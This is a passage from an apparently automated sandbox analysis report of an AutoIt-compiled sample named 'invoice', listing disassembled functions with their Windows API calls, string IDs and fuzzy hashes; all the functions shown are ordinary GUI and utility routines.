                        • Instruction Fuzzy Hash: 0FE17270900209ABEF629F64CC84EEE7BB9FF05750F00819AFA959A2D1D7758681DF50
                        Function 010048F8 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetCursorPos.USER32(?), ref: 01004A33
                        • GetDesktopWindow.USER32 ref: 01004A48
                        • GetWindowRect.USER32(00000000), ref: 01004A4F
                        • GetWindowLongW.USER32(?,000000F0), ref: 01004AB1
                        • DestroyWindow.USER32(?), ref: 01004ADD
                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 01004B06
                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 01004B24
                        • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 01004B4A
                        • SendMessageW.USER32(?,00000421,?,?), ref: 01004B5F
                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 01004B72
                        • IsWindowVisible.USER32(?), ref: 01004B92
                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 01004BAD
                        • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 01004BC1
                        • GetWindowRect.USER32(?,?), ref: 01004BD9
                        • MonitorFromPoint.USER32(?,?,00000002), ref: 01004BFF
                        • GetMonitorInfoW.USER32(00000000,?), ref: 01004C19
                        • CopyRect.USER32(?,?), ref: 01004C30
                        • SendMessageW.USER32(?,00000412,00000000), ref: 01004C9B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                        • String ID: ($0$tooltips_class32
                        • API String ID: 698492251-4156429822
                        • Opcode ID: 23cc73f8bc452fea6587c33d3bed158d907d37ab2c10fc216fafba34d622668d
                        • Instruction ID: 9c911d750c7f81dc738889e4db6211f6087ce4e61889357ce4263d17acb8b55a
                        • Opcode Fuzzy Hash: 23cc73f8bc452fea6587c33d3bed158d907d37ab2c10fc216fafba34d622668d
                        • Instruction Fuzzy Hash: 3BB18C71608301AFEB55DF24C848B6ABBE4FF89310F04891CF6D99B291DB75E805CB59
                        Function 00F827D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                        Download Yara Rule
                        APIs
                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F828BC
                        • GetSystemMetrics.USER32(00000007), ref: 00F828C4
                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F828EF
                        • GetSystemMetrics.USER32(00000008), ref: 00F828F7
                        • GetSystemMetrics.USER32(00000004), ref: 00F8291C
                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00F82939
                        • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00F82949
                        • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00F8297C
                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00F82990
                        • GetClientRect.USER32(00000000,000000FF), ref: 00F829AE
                        • GetStockObject.GDI32(00000011), ref: 00F829CA
                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00F829D5
                          • Part of subcall function 00F82344: GetCursorPos.USER32(?), ref: 00F82357
                          • Part of subcall function 00F82344: ScreenToClient.USER32(010457B0,?), ref: 00F82374
                          • Part of subcall function 00F82344: GetAsyncKeyState.USER32(00000001), ref: 00F82399
                          • Part of subcall function 00F82344: GetAsyncKeyState.USER32(00000002), ref: 00F823A7
                        • SetTimer.USER32(00000000,00000000,00000028,00F81256), ref: 00F829FC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                        • String ID: AutoIt v3 GUI
                        • API String ID: 1458621304-248962490
                        • Opcode ID: 23e860954b0a0f62cc159d540c11e002ac17a04f1e158da1f20b25e3657f4b37
                        • Instruction ID: 81dbe0ab160b73c1f1aa5eea199660e4e5bf17025d48bc63e87db0e621ebd3be
                        • Opcode Fuzzy Hash: 23e860954b0a0f62cc159d540c11e002ac17a04f1e158da1f20b25e3657f4b37
                        • Instruction Fuzzy Hash: 36B18171A0020ADFDB24EFA8DC85BEE77B4FB08711F104129FA55A7294DB79A801EB50
                        Function 00FDA844 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                        Download Yara Rule
                        APIs
                        • GetClassNameW.USER32(?,?,00000100), ref: 00FDA885
                        • __swprintf.LIBCMT ref: 00FDA926
                        • _wcscmp.LIBCMT ref: 00FDA939
                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00FDA98E
                        • _wcscmp.LIBCMT ref: 00FDA9CA
                        • GetClassNameW.USER32(?,?,00000400), ref: 00FDAA01
                        • GetDlgCtrlID.USER32(?), ref: 00FDAA53
                        • GetWindowRect.USER32(?,?), ref: 00FDAA89
                        • GetParent.USER32(?), ref: 00FDAAA7
                        • ScreenToClient.USER32(00000000), ref: 00FDAAAE
                        • GetClassNameW.USER32(?,?,00000100), ref: 00FDAB28
                        • _wcscmp.LIBCMT ref: 00FDAB3C
                        • GetWindowTextW.USER32(?,?,00000400), ref: 00FDAB62
                        • _wcscmp.LIBCMT ref: 00FDAB76
                          • Part of subcall function 00FA37AC: _iswctype.LIBCMT ref: 00FA37B4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                        • String ID: %s%u
                        • API String ID: 3744389584-679674701
                        • Opcode ID: 7216dbb34495ccc847159015cdf95e95b0b496bf4d7fbd0aa4feef3d22c9ab46
                        • Instruction ID: 8d4a5c7e49417af704896d4311c649b8699fa6a97487b4aa38df3b2c2b4e7daf
                        • Opcode Fuzzy Hash: 7216dbb34495ccc847159015cdf95e95b0b496bf4d7fbd0aa4feef3d22c9ab46
                        • Instruction Fuzzy Hash: 41A1F571604702AFD715DF20C884FAAB7EAFF44324F08461BF999C2250D734E946EB96
                        Function 00FDB196 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                        Download Yara Rule
                        APIs
                        • GetClassNameW.USER32(00000008,?,00000400), ref: 00FDB1DA
                        • _wcscmp.LIBCMT ref: 00FDB1EB
                        • GetWindowTextW.USER32(00000001,?,00000400), ref: 00FDB213
                        • CharUpperBuffW.USER32(?,00000000), ref: 00FDB230
                        • _wcscmp.LIBCMT ref: 00FDB24E
                        • _wcsstr.LIBCMT ref: 00FDB25F
                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00FDB297
                        • _wcscmp.LIBCMT ref: 00FDB2A7
                        • GetWindowTextW.USER32(00000002,?,00000400), ref: 00FDB2CE
                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00FDB317
                        • _wcscmp.LIBCMT ref: 00FDB327
                        • GetClassNameW.USER32(00000010,?,00000400), ref: 00FDB34F
                        • GetWindowRect.USER32(00000004,?), ref: 00FDB3B8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                        • String ID: @$ThumbnailClass
                        • API String ID: 1788623398-1539354611
                        • Opcode ID: 658cf3ec8c20ad8846fca3f0d35a1b8a787b26eead4602ac569942062e160cfe
                        • Instruction ID: 125bc695552d70271f9a78e2b9be2ac4a6cdb53c5e5ced27c642bf4daa41709f
                        • Opcode Fuzzy Hash: 658cf3ec8c20ad8846fca3f0d35a1b8a787b26eead4602ac569942062e160cfe
                        • Instruction Fuzzy Hash: BD81D172408306DBDB11DF10C881FAA77E9FF44724F08856AFD898A296DB34DD45EB61
                        Function 00FDAFDF Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: __wcsnicmp
                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                        • API String ID: 1038674560-1810252412
                        • Opcode ID: 11fd8ac6b3cfa6df9c9e240a8f68899797459d44c634702a478b2640dc4abbb1
                        • Instruction ID: e0204872483cfe63242f3c3f7474732508185ad12690bd5c377d706f02d36c30
                        • Opcode Fuzzy Hash: 11fd8ac6b3cfa6df9c9e240a8f68899797459d44c634702a478b2640dc4abbb1
                        • Instruction Fuzzy Hash: BD31ED71A44709E6DB24FAA1CC47FEF73A99F50B20F28001AB491751D2EF65AF05F650
                        Function 00FDC2C0 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON
                        Download Yara Rule
                        APIs
                        • LoadIconW.USER32(00000063), ref: 00FDC2D3
                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00FDC2E5
                        • SetWindowTextW.USER32(?,?), ref: 00FDC2FC
                        • GetDlgItem.USER32(?,000003EA), ref: 00FDC311
                        • SetWindowTextW.USER32(00000000,?), ref: 00FDC317
                        • GetDlgItem.USER32(?,000003E9), ref: 00FDC327
                        • SetWindowTextW.USER32(00000000,?), ref: 00FDC32D
                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00FDC34E
                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00FDC368
                        • GetWindowRect.USER32(?,?), ref: 00FDC371
                        • SetWindowTextW.USER32(?,?), ref: 00FDC3DC
                        • GetDesktopWindow.USER32 ref: 00FDC3E2
                        • GetWindowRect.USER32(00000000), ref: 00FDC3E9
                        • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00FDC435
                        • GetClientRect.USER32(?,?), ref: 00FDC442
                        • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00FDC467
                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00FDC492
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                        • String ID:
                        • API String ID: 3869813825-0
                        • Opcode ID: a9bbf4466465a3ac9fa2f72bf0101bab93243329dd1490790d5c55b070bd889b
                        • Instruction ID: 944b017c306018b16cdf73691b75fc1ec79e64e87022191676165274427d2158
                        • Opcode Fuzzy Hash: a9bbf4466465a3ac9fa2f72bf0101bab93243329dd1490790d5c55b070bd889b
                        • Instruction Fuzzy Hash: 5B519D3190070AEFDB31DFA8DD85B6EBBB6FF08714F044519E582A26A0CB75A904EB50
                        Function 00FF5113 Relevance: 25.6, APIs: 17, Instructions: 110COMMON
                        Download Yara Rule
                        APIs
                        • LoadCursorW.USER32(00000000,00007F8A), ref: 00FF5129
                        • LoadCursorW.USER32(00000000,00007F00), ref: 00FF5134
                        • LoadCursorW.USER32(00000000,00007F03), ref: 00FF513F
                        • LoadCursorW.USER32(00000000,00007F8B), ref: 00FF514A
                        • LoadCursorW.USER32(00000000,00007F01), ref: 00FF5155
                        • LoadCursorW.USER32(00000000,00007F81), ref: 00FF5160
                        • LoadCursorW.USER32(00000000,00007F88), ref: 00FF516B
                        • LoadCursorW.USER32(00000000,00007F80), ref: 00FF5176
                        • LoadCursorW.USER32(00000000,00007F86), ref: 00FF5181
                        • LoadCursorW.USER32(00000000,00007F83), ref: 00FF518C
                        • LoadCursorW.USER32(00000000,00007F85), ref: 00FF5197
                        • LoadCursorW.USER32(00000000,00007F82), ref: 00FF51A2
                        • LoadCursorW.USER32(00000000,00007F84), ref: 00FF51AD
                        • LoadCursorW.USER32(00000000,00007F04), ref: 00FF51B8
                        • LoadCursorW.USER32(00000000,00007F02), ref: 00FF51C3
                        • LoadCursorW.USER32(00000000,00007F89), ref: 00FF51CE
                        • GetCursorInfo.USER32(?), ref: 00FF51DE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Cursor$Load$Info
                        • String ID:
                        • API String ID: 2577412497-0
                        • Opcode ID: e5d3ae3c137a68274354679b2f7d625d445cc8630eca824b886be9d1002335f4
                        • Instruction ID: 0c271becba7506499f4741e7b97acc516f1fef20f1a1b4937db963ccc66f9090
                        • Opcode Fuzzy Hash: e5d3ae3c137a68274354679b2f7d625d445cc8630eca824b886be9d1002335f4
                        • Instruction Fuzzy Hash: FD3107B1D4831D6ADB209FB68C8996EBEE8FF04750F50452AE64DE7280DB7865009F91
                        Function 0100A1EB Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                        Download Yara Rule
                        APIs
                        • _memset.LIBCMT ref: 0100A28B
                        • DestroyWindow.USER32(?,?), ref: 0100A305
                          • Part of subcall function 00F87D2C: _memmove.LIBCMT ref: 00F87D66
                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0100A37F
                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0100A3A1
                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0100A3B4
                        • DestroyWindow.USER32(00000000), ref: 0100A3D6
                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00F80000,00000000), ref: 0100A40D
                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0100A426
                        • GetDesktopWindow.USER32 ref: 0100A43F
                        • GetWindowRect.USER32(00000000), ref: 0100A446
                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0100A45E
                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0100A476
                          • Part of subcall function 00F825DB: GetWindowLongW.USER32(?,000000EB), ref: 00F825EC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                        • String ID: 0$tooltips_class32
                        • API String ID: 1297703922-3619404913
                        • Opcode ID: e6a4c9efaf88bcced3cece726403ba7ccd23c902aee2c4d97e040e91888bb3aa
                        • Instruction ID: ed0d375f4e798b6a2614fe4d5e73d7234398b953bcc3cc4a6ea242e7ef1a537c
                        • Opcode Fuzzy Hash: e6a4c9efaf88bcced3cece726403ba7ccd23c902aee2c4d97e040e91888bb3aa
                        • Instruction Fuzzy Hash: 88719975244345AFE722CF28CC48F6A7BE5FB88700F04455CF9C59B2A0CB75A902DB21
                        Function 0100C668 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F82612: GetWindowLongW.USER32(?,000000EB), ref: 00F82623
                        • DragQueryPoint.SHELL32(?,?), ref: 0100C691
                          • Part of subcall function 0100AB69: ClientToScreen.USER32(?,?), ref: 0100AB92
                          • Part of subcall function 0100AB69: GetWindowRect.USER32(?,?), ref: 0100AC08
                          • Part of subcall function 0100AB69: PtInRect.USER32(?,?,0100C07E), ref: 0100AC18
                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0100C6FA
                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0100C705
                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0100C728
                        • _wcscat.LIBCMT ref: 0100C758
                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0100C76F
                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0100C788
                        • SendMessageW.USER32(?,000000B1,?,?), ref: 0100C79F
                        • SendMessageW.USER32(?,000000B1,?,?), ref: 0100C7C1
                        • DragFinish.SHELL32(?), ref: 0100C7C8
                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0100C8BB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                        • API String ID: 169749273-3440237614
                        • Opcode ID: 601e7561b8d903dd4a2fcc22fb20f96681fdf6044da373022c83e48cf1c3ae95
                        • Instruction ID: 86bacff78d74b2322e43c1d48c68ef096d4e485b4a0ad27c9583296bb9263e00
                        • Opcode Fuzzy Hash: 601e7561b8d903dd4a2fcc22fb20f96681fdf6044da373022c83e48cf1c3ae95
                        • Instruction Fuzzy Hash: E7618971108301AFD712EF60CC85D9FBBE8FF88750F000A5EF691961A1DB759A09DB92
                        Function 010043FB Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                        Download Yara Rule
                        APIs
                        • CharUpperBuffW.USER32(?,?), ref: 0100448D
                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 010044D8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: BuffCharMessageSendUpper
                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                        • API String ID: 3974292440-4258414348
                        • Opcode ID: cc53d75635165e97582d58c82114b1cf5a920625816d77d21f5158f722c74b1f
                        • Instruction ID: 50c456321abb147300d7b7c0054d1ee080e9fab16e64145e6d733756e261c2df
                        • Opcode Fuzzy Hash: cc53d75635165e97582d58c82114b1cf5a920625816d77d21f5158f722c74b1f
                        • Instruction Fuzzy Hash: 1291AD702087018FDA15EF10C891AADB7E1AF84314F08449DF9D69B3A2DB79ED0ADB81
                        Function 0100B832 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                        Download Yara Rule
                        APIs
                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0100B8E8
                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,01006B43,?), ref: 0100B944
                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0100B97D
                        • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0100B9C0
                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0100B9F7
                        • FreeLibrary.KERNEL32(?), ref: 0100BA03
                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0100BA13
                        • DestroyIcon.USER32(?), ref: 0100BA22
                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0100BA3F
                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0100BA4B
                          • Part of subcall function 00FA307D: __wcsicmp_l.LIBCMT ref: 00FA3106
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                        • String ID: .dll$.exe$.icl
                        • API String ID: 1212759294-1154884017
                        • Opcode ID: bab4c9f13f08546e5172a0ec02010109c253fa26eaa49ed5856f8a89f03c40ce
                        • Instruction ID: fa4d2afe5b312b55a59b15372bf9a82be2f4186b3f3eb7404bd5063cd2b3b3be
                        • Opcode Fuzzy Hash: bab4c9f13f08546e5172a0ec02010109c253fa26eaa49ed5856f8a89f03c40ce
                        • Instruction Fuzzy Hash: A8610071600609BEFB26DF68CC45BBE7BA8FB09711F004119F995D61C1DB79AA80D7A0
                        Function 00FEA3DC Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F89997: __itow.LIBCMT ref: 00F899C2
                          • Part of subcall function 00F89997: __swprintf.LIBCMT ref: 00F89A0C
                        • CharLowerBuffW.USER32(?,?), ref: 00FEA455
                        • GetDriveTypeW.KERNEL32 ref: 00FEA4A2
                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FEA4EA
                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FEA521
                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FEA54F
                          • Part of subcall function 00F87D2C: _memmove.LIBCMT ref: 00F87D66
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                        • API String ID: 2698844021-4113822522
                        • Opcode ID: 77edff78ae629ac2673946cc83ae77b48ef97d85c189a905767771ce71116628
                        • Instruction ID: 7c90f343bd47a0414a77808a9adc57403f70ec0882f705fef6b5f13160480b9a
                        • Opcode Fuzzy Hash: 77edff78ae629ac2673946cc83ae77b48ef97d85c189a905767771ce71116628
                        • Instruction Fuzzy Hash: B35149711083049FC700EF21CC919AAB7E8FF88718F14895DF88697261DB35EE0ADB82
                        Function 00FDFBDB Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON
                        Download Yara Rule
